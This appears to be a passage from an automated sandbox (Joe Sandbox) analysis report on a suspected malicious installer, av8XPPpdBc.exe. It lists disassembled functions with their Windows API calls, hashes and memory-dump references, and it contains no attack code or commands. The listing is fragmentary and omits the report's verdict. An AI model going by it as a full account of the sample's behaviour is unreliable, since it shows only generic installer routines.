                                                                                                                                                                                      • Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                      • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                                                                      • Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                                                                      Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                      • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                      • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                                                                      Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                      • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                      • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                                                                      Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                      • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                      • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                                                                      Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                      • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                      • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                                                                      Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 2655323295-1506623398
                                                                                                                                                                                      • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                      • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                                                                                                                                                      Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nswE27F.tmp, xrefs: 00405ED2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 3213498283-1506623398
                                                                                                                                                                                      • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                      • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                                                                                                                      • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                                                                                                                      Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 2659869361-3936084776
                                                                                                                                                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                      • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                                                                      Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll), ref: 0040269A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp$C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll
                                                                                                                                                                                      • API String ID: 1659193697-3071547946
                                                                                                                                                                                      • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                      • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                      • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                                                                                                                                                      Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                      • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                      • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                                                                      Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                                                                        • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
